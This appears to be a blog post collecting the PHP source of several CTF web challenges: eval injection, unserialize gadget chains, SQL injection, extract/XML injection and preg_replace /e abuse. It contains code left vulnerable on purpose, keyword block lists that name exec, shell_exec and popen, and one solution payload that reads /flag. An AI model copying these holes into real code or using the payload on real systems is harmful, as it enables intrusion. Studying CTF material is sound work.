数条CTF题目

发表评论

evilecho

index.php

<?php

echo <span class="hljs-string">"<h2>Tips: eval & echo = ?</h2>"</span>;

<span class="hljs-variable">$hostHeader</span> = <span class="hljs-variable">$_SERVER</span>[<span class="hljs-string">'HTTP_HOST'</span>];
list(<span class="hljs-variable">$hostname</span>, <span class="hljs-variable">$port</span>) = explode(<span class="hljs-string">':'</span>, <span class="hljs-variable">$hostHeader</span>);

<span class="hljs-variable">$image</span> = isset(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">"file"</span>]) ? <span class="hljs-string">"./images/"</span> . <span class="hljs-variable">$_GET</span>[<span class="hljs-string">"file"</span>] : <span class="hljs-string">""</span>;

<span class="hljs-keyword">if</span> (<span class="hljs-variable">$image</span> == <span class="hljs-string">""</span>) {
    header(<span class="hljs-string">"Location: "</span> . <span class="hljs-string">"http://$hostname:$port"</span> . <span class="hljs-string">"/index.php?file=eason.jpg"</span>);
}

<span class="hljs-variable">$file</span> = <span class="hljs-string">"echo '<img src=\""</span> . <span class="hljs-variable">$image</span> . <span class="hljs-string">"\" width=200px height=auto>';"</span>;

<span class="hljs-keyword">if</span> (in_array(strtolower(<span class="hljs-variable">$image</span>), array(<span class="hljs-string">"cat"</span>, <span class="hljs-string">" "</span>, <span class="hljs-string">"flag"</span>, <span class="hljs-string">"docker"</span>, <span class="hljs-string">"shell_exec"</span>, <span class="hljs-string">"exec"</span>, <span class="hljs-string">"popen"</span>))) {
    <span class="hljs-keyword">exit</span>(<span class="hljs-string">"Hacker!!!!"</span>);
}
eval (<span class="hljs-variable">$file</span>);

?>

happy

index.php

 <span class="php"><span class="hljs-meta"><?php</span>
highlight_file(<span class="hljs-keyword">__FILE__</span>);
error_reporting(<span class="hljs-number">0</span>);

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">hahaha</span>
</span>{
    <span class="hljs-keyword">public</span> $cmd;
    <span class="hljs-keyword">public</span> $content;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($cmd, $content)</span>
    </span>{
        <span class="hljs-keyword">$this</span>->cmd = $cmd;
        <span class="hljs-keyword">$this</span>->content = $content;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__call</span><span class="hljs-params">($name, $arguments)</span>
    </span>{
        call_user_func(<span class="hljs-keyword">$this</span>->cmd, <span class="hljs-keyword">$this</span>->content);
    }

}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Nevv</span>
</span>{
    <span class="hljs-keyword">public</span> $happiness;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__invoke</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->happiness->check();
    }

}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Rabbit</span>
</span>{
    <span class="hljs-keyword">public</span> $aspiration;
    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__set</span><span class="hljs-params">($name, $val)</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->aspiration->family;
    }
}

<span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Year</span>
</span>{
    <span class="hljs-keyword">public</span> $key;
    <span class="hljs-keyword">public</span> $rabbit;

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__construct</span><span class="hljs-params">($key)</span>
    </span>{
        <span class="hljs-keyword">$this</span>->key = $key;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">firecrackers</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>->rabbit->wish = <span class="hljs-string">"allkill QAQ"</span>;
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__get</span><span class="hljs-params">($name)</span>
    </span>{
        $name = <span class="hljs-keyword">$this</span>->rabbit;
        $name();
    }

    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">__destruct</span><span class="hljs-params">()</span>
    </span>{
        <span class="hljs-keyword">if</span> (<span class="hljs-keyword">$this</span>->key == <span class="hljs-string">"come on"</span>) {
            <span class="hljs-keyword">$this</span>->firecrackers();
        } <span class="hljs-keyword">else</span> {
            <span class="hljs-keyword">print</span> (<span class="hljs-string">"Welcome 2025!!!!!"</span>);
        }
    }
}

<span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">'poc'</span>])) {
    $a = unserialize($_GET[<span class="hljs-string">'poc'</span>]);
} <span class="hljs-keyword">else</span> {
    <span class="hljs-keyword">echo</span> <span class="hljs-string">"come on"</span>;
}


<span class="hljs-meta">?></span></span>

issql

index.php

<span class="hljs-tag"><<span class="hljs-name">html</span> <span class="hljs-attr">xmlns</span>=<span class="hljs-string">"http://www.w3.org/1999/xhtml"</span>></span>
<span class="hljs-comment"><!--This set of source code is made by MS. --></span>
<span class="hljs-comment"><!--Date 2018.12.13--></span>
    <span class="hljs-tag"><<span class="hljs-name">head</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">http-equiv</span>=<span class="hljs-string">Content-Type</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"text/html;charset=utf-8"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"description"</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"Test"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">meta</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"author"</span> <span class="hljs-attr">content</span>=<span class="hljs-string">"MRYE+"</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">title</span>></span>电脑信息查询 - 网络安全工作室<span class="hljs-tag"></<span class="hljs-name">title</span>></span>
        <span class="hljs-tag"><<span class="hljs-name">link</span> <span class="hljs-attr">rel</span>=<span class="hljs-string">"stylesheet"</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text/css"</span> <span class="hljs-attr">href</span>=<span class="hljs-string">"./css/ctf.css"</span> /></span>    
    <span class="hljs-tag"></<span class="hljs-name">style</span>></span>
<span class="hljs-tag"></<span class="hljs-name">head</span>></span>
<span class="hljs-tag"><<span class="hljs-name">body</span>></span>
<span class="hljs-tag"><<span class="hljs-name">div</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"container"</span>></span>
  <span class="hljs-tag"><<span class="hljs-name">div</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"search"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">label</span> <span class="hljs-attr">for</span>=<span class="hljs-string">"search"</span>></span>输入以1、2、3显示电脑信息<span class="hljs-tag"></<span class="hljs-name">label</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">form</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"myForm"</span> <span class="hljs-attr">action</span>=<span class="hljs-string">""</span> <span class="hljs-attr">method</span>=<span class="hljs-string">"post"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">input</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"text"</span> <span class="hljs-attr">id</span>=<span class="hljs-string">"ms"</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"ms"</span><span class="hljs-attr">maxlength</span>=<span class="hljs-string">"1"</span>></span>
    <span class="hljs-tag"><<span class="hljs-name">input</span> <span class="hljs-attr">class</span>=<span class="hljs-string">"button"</span> <span class="hljs-attr">type</span>=<span class="hljs-string">"submit"</span> <span class="hljs-attr">value</span>=<span class="hljs-string">"Search"</span>></span>
    <span class="hljs-tag"></<span class="hljs-name">form</span>></span>
<span class="php"><span class="hljs-meta"><?php</span>
<span class="hljs-comment">//禁用错误报告</span>
error_reporting(<span class="hljs-number">0</span>);
header(<span class="hljs-string">"Content-Type: text/html;charset=utf-8"</span>);
<span class="hljs-keyword">require_once</span> <span class="hljs-string">'./suxinctf.php'</span>;

<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">"ms"</span>]))
{
    $ID = $_POST[<span class="hljs-string">"ms"</span>];
    <span class="hljs-comment">#echo $ID;</span>
    $query = <span class="hljs-string">"select * from goods where id='{$ID}'"</span>;<span class="hljs-comment">//构建查询语句</span>
    $result = mysql_query($query);<span class="hljs-comment">//执行查询</span>
    <span class="hljs-keyword">if</span> (!$result) {
        <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
    }
    <span class="hljs-keyword">if</span> (mysql_numrows($result)<=<span class="hljs-number">0</span>) {
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>"</span>;
    }<span class="hljs-keyword">else</span>{
    <span class="hljs-keyword">while</span>($result_row=mysql_fetch_row(($result)))<span class="hljs-comment">//取出结果并显示</span>
    {
        $ms=$result_row[<span class="hljs-number">0</span>];
        $gname=$result_row[<span class="hljs-number">1</span>];
        $gprice=$result_row[<span class="hljs-number">2</span>];
        $gnum=$result_row[<span class="hljs-number">3</span>];
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑编号为:"</span>.$ms.<span class="hljs-string">"  </font> "</span>;;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑系统为:"</span>.$gname.<span class="hljs-string">"  </font>"</span>;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑价格为:"</span>.$gprice.<span class="hljs-string">"  </font>"</span>;
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<font color='red'>电脑数量为:"</span>.$gnum.<span class="hljs-string">"  </font>"</span>;
}
}
}
    $query = <span class="hljs-string">"select * from goods "</span>;<span class="hljs-comment">//构建查询语句</span>
    $result = mysql_query($query);<span class="hljs-comment">//执行查询</span>
    <span class="hljs-keyword">if</span> (!$result) {
        <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
    }
    <span class="hljs-keyword">if</span> (mysql_numrows($result)<=<span class="hljs-number">0</span>) {
        <span class="hljs-keyword">echo</span> <span class="hljs-string">"<script     type='text/javascript'>alert('都说了让你输入1~3你咋还那么调皮!');location.href='index.php'</script>"</span>;
    }<span class="hljs-keyword">else</span>{
    <span class="hljs-keyword">while</span>($result_row=mysql_fetch_row(($result)))<span class="hljs-comment">//取出结果并显示</span>
    {
        $ms=$result_row[<span class="hljs-number">0</span>];
        $gname=$result_row[<span class="hljs-number">1</span>];
    }

mysql_close($connection);<span class="hljs-comment">//关闭连接</span>
}
<span class="hljs-meta">?></span></span>
  <span class="hljs-tag"></<span class="hljs-name">div</span>></span>
<span class="hljs-tag"></<span class="hljs-name">div</span>></span>
<span class="hljs-tag"></<span class="hljs-name">body</span>></span>
<span class="hljs-tag"></<span class="hljs-name">html</span>></span>

suxinctf.php

<span class="php"><span class="hljs-meta"><?php</span>
$host = <span class="hljs-string">'localhost'</span>;
$database = <span class="hljs-string">'ctf'</span>;
$username = <span class="hljs-string">'root'</span>;
$password = <span class="hljs-string">''</span>;
$connection = mysql_connect($host, $username, $password);<span class="hljs-comment">//连接到数据库</span>
mysql_query(<span class="hljs-string">"set names 'utf8'"</span>);<span class="hljs-comment">//编码转化</span>
<span class="hljs-keyword">if</span> (!$connection) {
    <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not connect to the database.\n"</span> . mysql_error());<span class="hljs-comment">//诊断连接错误</span>
}
$selectedDb = mysql_select_db($database);<span class="hljs-comment">//选择数据库</span>
<span class="hljs-keyword">if</span> (!$selectedDb) {
    <span class="hljs-keyword">die</span>(<span class="hljs-string">"could not to the database\n"</span> . mysql_error());
}
<span class="hljs-meta">?></span></span>

ezphp

register.php

<span class="hljs-meta"><?php</span>
    <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/function.php"</span>;
    $config = <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/config.php"</span>;
    $user_xml_format = <span class="hljs-string">"<?xml version='1.0'?>
                        <userinfo>
                            <user>
                                <username>%s</username>
                                <password>%s</password>
                            </user>
                        </userinfo>"</span>;
    extract($_REQUEST);
    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($username)||<span class="hljs-keyword">empty</span>($password)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username or password cannot be empty XD"</span>);

    <span class="hljs-keyword">if</span>(!preg_match(<span class="hljs-string">'/^[a-zA-Z0-9_]+$/'</span>, $username)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Invalid username. :("</span>);

    <span class="hljs-keyword">if</span>(is_user_exists($username, $config[<span class="hljs-string">"user_info_dir"</span>])) <span class="hljs-keyword">die</span>(<span class="hljs-string">"User already exists XD"</span>);
    $user_xml = sprintf($user_xml_format, $username, $password);

    register_user($username, $config[<span class="hljs-string">'user_info_dir'</span>], $user_xml);

login.php

<span class="php"><span class="hljs-meta"><?php</span>
    <span class="hljs-keyword">include</span> <span class="hljs-string">"utils/function.php"</span>;
    $config = <span class="hljs-keyword">include</span>  <span class="hljs-string">"utils/config.php"</span>;
    $username = $_REQUEST[<span class="hljs-string">'username'</span>];
    $password = $_REQUEST[<span class="hljs-string">'password'</span>];
    <span class="hljs-keyword">if</span>(<span class="hljs-keyword">empty</span>($username)||<span class="hljs-keyword">empty</span>($password)) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username or password cannot be empty XD"</span>);
    <span class="hljs-keyword">if</span>(!is_user_exists($username, $config[<span class="hljs-string">"user_info_dir"</span>])) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Username error"</span>);
    $user_record = get_user_record($username, $config[<span class="hljs-string">'user_info_dir'</span>]);
    <span class="hljs-keyword">if</span>($user_record->user->password != $password) <span class="hljs-keyword">die</span>(<span class="hljs-string">"Password error for User:"</span>.$user_record->user->username);
    header(<span class="hljs-string">"Location:main.html"</span>);</span>

crackme

index.php

<span class="php"><span class="hljs-meta"><?php</span>
<span class="hljs-keyword">if</span> ($_GET[<span class="hljs-string">'crack'</span>] === <span class="hljs-string">'flag'</span>) {
    highlight_file(<span class="hljs-keyword">__FILE__</span>);
    <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">'hk'</span>]) && <span class="hljs-keyword">isset</span>($_POST[<span class="hljs-string">'flag'</span>])) {
        $str1 = $_POST[<span class="hljs-string">'hk'</span>];
        $str2 = $_POST[<span class="hljs-string">'flag'</span>];
        <span class="hljs-keyword">if</span> (preg_match(<span class="hljs-string">'/system|eval|assert|call|create|preg|sort|{|}|filter|exec|passthru|proc|open|echo|`| |\.|include|require|flag/i'</span>, $str1) || strlen($str2) != <span class="hljs-number">19</span> || preg_match(<span class="hljs-string">'/give_me_flag/'</span>, $str2)) {
            <span class="hljs-keyword">die</span>(<span class="hljs-string">'hacker!'</span>);
        } <span class="hljs-keyword">else</span> {
            preg_replace(<span class="hljs-string">"/give_me_flag/ei"</span>, $_POST[<span class="hljs-string">'hk'</span>], $_POST[<span class="hljs-string">'flag'</span>]);
        }
    }
} <span class="hljs-keyword">else</span> {
    <span class="hljs-keyword">echo</span> <span class="hljs-string">"moran want a flag.</br>(?crack=flag)"</span>;
}</span>

<span class="hljs-keyword">POST</span> <span class="hljs-string">?crack=flag&a=readfile&b=/flag</span> HTTP/1.1

<span class="ini"><span class="hljs-attr">hk</span>=<span class="hljs-variable">$_GET</span>[a](<span class="hljs-variable">$_GET</span>[b])&flag=give_me_Flag/ei1111</span>

 

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注